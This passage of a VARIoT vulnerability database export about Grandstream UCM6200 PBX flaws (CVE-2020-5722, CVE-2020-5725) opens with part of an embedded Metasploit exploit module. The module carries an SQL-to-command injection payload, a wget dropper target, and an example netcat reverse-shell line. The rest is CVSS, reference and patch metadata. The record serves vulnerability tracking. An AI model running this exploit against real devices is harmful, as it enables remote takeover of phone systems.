\u0027cmd/unix/reverse_netcat_gaping\u0027\n              }\n            }\n          ],\n          [\n            \u0027Linux Dropper\u0027,\n            {\n              \u0027Platform\u0027 =\u003e \u0027linux\u0027,\n              \u0027Arch\u0027 =\u003e [ARCH_ARMLE],\n              \u0027Type\u0027 =\u003e :linux_dropper,\n              \u0027CmdStagerFlavor\u0027 =\u003e [ \u0027wget\u0027 ]\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 1,\n        
\u0027DefaultOptions\u0027 =\u003e {\n          \u0027RPORT\u0027 =\u003e 8089,\n          \u0027SSL\u0027 =\u003e true\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [CRASH_SAFE],\n          \u0027Reliability\u0027 =\u003e [REPEATABLE_SESSION],\n          \u0027SideEffects\u0027 =\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]\n        }\n      )\n    )\n    register_options([\n      OptString.new(\u0027TARGETURI\u0027, [true, \u0027Base path\u0027, \u0027/\u0027])\n    ])\n  end\n\n  ##\n  # Sends a POST /cgi request with a payload of action=getInfo. The\n  # server should respond with a large json blob like the following,\n  # where \"prog_version\" is he firmware version:\n  #\n  # {\"response\"=\u003e{\n  #   \"model_name\"=\u003e\"UCM6202\", \"description\"=\u003e\"IPPBX Appliance\",\n  #   \"device_name\"=\u003e\"\", \"logo\"=\u003e\"images/h_logo.png\", \"logo_url\"=\u003e\"http://www.grandstream.com/\",\n  #   \"copyright\"=\u003e\"Copyright \\u00A9 Grandstream Networks, Inc. 2014. 
All Rights Reserved.\",\n  #    \"num_fxo\"=\u003e\"2\", \"num_fxs\"=\u003e\"2\", \"num_pri\"=\u003e\"0\", \"num_eth\"=\u003e\"2\", \"allow_nat\"=\u003e\"1\",\n  #    \"svip_type\"=\u003e\"4\", \"net_mode\"=\u003e\"0\", \"prog_version\"=\u003e\"1.0.18.13\", \"country\"=\u003e\"US\",\n  #    \"support_openvpn\"=\u003e\"1\", \"enable_openvpn\"=\u003e\"0\", \"enable_webrtc_openvpn\"=\u003e\"0\",\n  #    \"support_webrtc_cloud\"=\u003e\"0\"}, \"status\"=\u003e0}\n  ###\n  def check\n    normalized_uri = normalize_uri(target_uri.path, \u0027/cgi\u0027)\n    vprint_status(\"Requesting version information from #{normalized_uri}\")\n    res = send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalized_uri,\n      \u0027vars_post\u0027 =\u003e { \u0027action\u0027 =\u003e \u0027getInfo\u0027 }\n    })\n\n    return CheckCode::Unknown(\u0027HTTP status code is not 200\u0027) unless res\u0026.code == 200\n\n    body_json = res.get_json_document\n    return CheckCode::Unknown(\u0027No JSON in response\u0027) unless body_json\n\n    prog_version = body_json.dig(\u0027response\u0027, \u0027prog_version\u0027)\n    return false if prog_version.nil?\n\n    vprint_status(\"The reported version is: #{prog_version}\")\n\n    version = Rex::Version.new(prog_version)\n    if version \u003c Rex::Version.new(\u00271.0.19.20\u0027)\n      return CheckCode::Appears(\"This determination is based on the version string: #{prog_version}.\")\n    end\n\n    return CheckCode::Safe(\"This determination is based on the version string: #{prog_version}.\")\n  end\n\n  ##\n  # Throws a payload at the sendPasswordEmail action. The payload must first survive an SQL injection\n  # and then it will get passed to a python script via sh which allows us to execute a command injection. 
\n  # It will look something like this:\n  #\n  # /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \\\n  #     password \u0027\u0027 `cat \u003c\u003c\u0027TTsf7G0\u0027 z\u0027 or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `\n  #\n  # This functionality is related to the\"Forgot Password\" feature. This function is rate limited by\n  # the server so that an attacker can only invoke it, at most, every 60 seconds. As such, only a few\n  # payloads are appropriate. \n  ###\n  def execute_command(cmd, _opts = {})\n    rand_num = Rex::Text.rand_text_numeric(1..5)\n    res = send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027/cgi\u0027),\n      \u0027vars_post\u0027 =\u003e\n      {\n        \u0027action\u0027 =\u003e \u0027sendPasswordEmail\u0027,\n        \u0027user_name\u0027 =\u003e \"\u0027 or #{rand_num}=#{rand_num}--`;`#{cmd}`;`\"\n      }\n    }, 5)\n\n    # the netcat reverse shell payload holds the connection open. So we\u0027ll treat no response\n    # as a success. The meterpreter payload does not hold the connection open so this clause digs\n    # deeper to ensure it succeeded. The server will respond with a non-0 status if the payload\n    # generates an error (e.g. 
rate limit error)\n    if res\n      fail_with(Failure::UnexpectedReply, \u0027The target did not respond with a 200 OK\u0027) unless res.code == 200\n\n      body_json = res.get_json_document\n      fail_with(Failure::UnexpectedReply, \u0027The target did not respond with a JSON body\u0027) unless body_json\n\n      status_json = body_json[\u0027status\u0027]\n      fail_with(Failure::UnexpectedReply, \u0027The JSON response is missing the status element\u0027) unless status_json\n      fail_with(Failure::UnexpectedReply, \"The server responded with an error status #{status_json}\") unless status_json == 0\n    end\n\n    print_good(\u0027Exploit successfully executed.\u0027)\n  end\n\n  def exploit\n    print_status(\"Executing #{target.name} for #{datastore[\u0027PAYLOAD\u0027]}\")\n    case target[\u0027Type\u0027]\n    when :unix_cmd\n      execute_command(payload.encoded)\n    when :linux_dropper\n      execute_cmdstager\n    end\n  end\nend\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-5722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5722"
      },
      {
        "db": "PACKETSTORM",
        "id": "165708"
      }
    ],
    "trust": 2.34
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=48247",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-5722",
        "trust": 3.2
      },
      {
        "db": "PACKETSTORM",
        "id": "156876",
        "trust": 3.1
      },
      {
        "db": "PACKETSTORM",
        "id": "165708",
        "trust": 1.8
      },
      {
        "db": "TENABLE",
        "id": "TRA-2020-15",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190",
        "trust": 0.8
      },
      {
        "db": "EXPLOIT-DB",
        "id": "48247",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1337",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5722",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "db": "PACKETSTORM",
        "id": "165708"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "id": "VAR-202003-1435",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      }
    ],
    "trust": 1.45714287
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      }
    ]
  },
  "last_update_date": "2024-01-18T22:55:19.159000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.grandstream.com/"
      },
      {
        "title": "Patch for Grandstream UCM6200 SQL injection vulnerability (CNVD-2020-23201)",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/214293"
      },
      {
        "title": "Repair measures for Grandstream UCM6200 SQL injection vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=112779"
      },
      {
        "title": "Known Exploited Vulnerabilities Detector",
        "trust": 0.1,
        "url": "https://github.com/ostorlab/kev"
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/inside-hoaxcalls-botnet-success-failure/156107/"
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-89",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.7,
        "url": "http://packetstormsecurity.com/files/156876/ucm6202-1.0.18.13-remote-command-injection.html"
      },
      {
        "trust": 2.3,
        "url": "http://packetstormsecurity.com/files/165708/grandstream-ucm62xx-ip-pbx-sendpasswordemail-remote-code-execution.html"
      },
      {
        "trust": 1.7,
        "url": "https://www.tenable.com/security/research/tra-2020-15"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-5722"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5722"
      },
      {
        "trust": 0.7,
        "url": "https://www.exploit-db.com/exploits/48247"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/89.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/"
      },
      {
        "trust": 0.1,
        "url": "http://www.grandstream.com/"
      },
      {
        "trust": 0.1,
        "url": "https://metasploit.com/download"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/rapid7/metasploit-framework"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "db": "PACKETSTORM",
        "id": "165708"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "db": "PACKETSTORM",
        "id": "165708"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-04-17T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      },
      {
        "date": "2020-03-23T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-5722"
      },
      {
        "date": "2020-04-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "date": "2022-01-25T16:34:16",
        "db": "PACKETSTORM",
        "id": "165708"
      },
      {
        "date": "2020-03-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      },
      {
        "date": "2020-03-23T20:15:12.043000",
        "db": "NVD",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-04-17T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      },
      {
        "date": "2022-02-10T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-5722"
      },
      {
        "date": "2020-04-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "date": "2022-01-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      },
      {
        "date": "2022-02-10T07:31:15.567000",
        "db": "NVD",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "165708"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SQL injection vulnerabilities in the Grandstream UCM6200 series",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SQL injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      }
    ],
    "trust": 0.6
  }
}

VAR-202003-1438

Vulnerability from variot - Updated: 2023-12-18 12:17

The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server's websockify endpoint. A remote unauthenticated attacker can invoke the login action with a crafted username and, through the use of timing attacks, can discover user passwords. Grandstream UCM6200 is a series of enterprise-level switches for IP telephone communication made by the US company Grandstream. The vulnerability stems from the application not validating externally supplied input before it is used in SQL statements. Attackers can use this vulnerability to execute unauthorized SQL commands.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202003-1438",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ucm6208",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6204",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6202",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6202",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6204",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6208",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6200",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20682"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003470"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5725"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:grandstream:ucm6202_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.0.20.22",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:grandstream:ucm6202:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:grandstream:ucm6204_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.0.20.22",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:grandstream:ucm6204:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:grandstream:ucm6208_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.0.20.22",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:grandstream:ucm6208:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-5725"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Jacob Baines",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1715"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2020-5725",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-003470",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.4,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "id": "CNVD-2020-20682",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.2,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.9,
            "baseSeverity": "Medium",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-003470",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-5725",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2020-003470",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-20682",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202003-1715",
            "trust": 0.6,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20682"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003470"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5725"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1715"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server\u0027s websockify endpoint. A remote unauthenticated attacker can invoke the login action with a crafted username and, through the use of timing attacks, can discover user passwords. Grandstream UCM6200 is a series of enterprise-level switches for IP telephone communication, made by the US company Grandstream. The vulnerability stems from the database-backed application not validating externally supplied input used in SQL statements. Attackers can use this vulnerability to execute illegal SQL commands.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-5725"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003470"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-20682"
      }
    ],
    "trust": 2.16
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-5725",
        "trust": 3.0
      },
      {
        "db": "TENABLE",
        "id": "TRA-2020-17",
        "trust": 2.4
      },
      {
        "db": "PACKETSTORM",
        "id": "156976",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003470",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-20682",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1715",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20682"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003470"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5725"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1715"
      }
    ]
  },
  "id": "VAR-202003-1438",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20682"
      }
    ],
    "trust": 1.45714287
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20682"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:17:13.137000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.grandstream.com/"
      },
      {
        "title": "Patch for Grandstream UCM6200 SQL injection vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/211861"
      },
      {
        "title": "Grandstream UCM6200 SQL Repair measures for injecting vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=113110"
      }
    ],
    "sources": [
      {
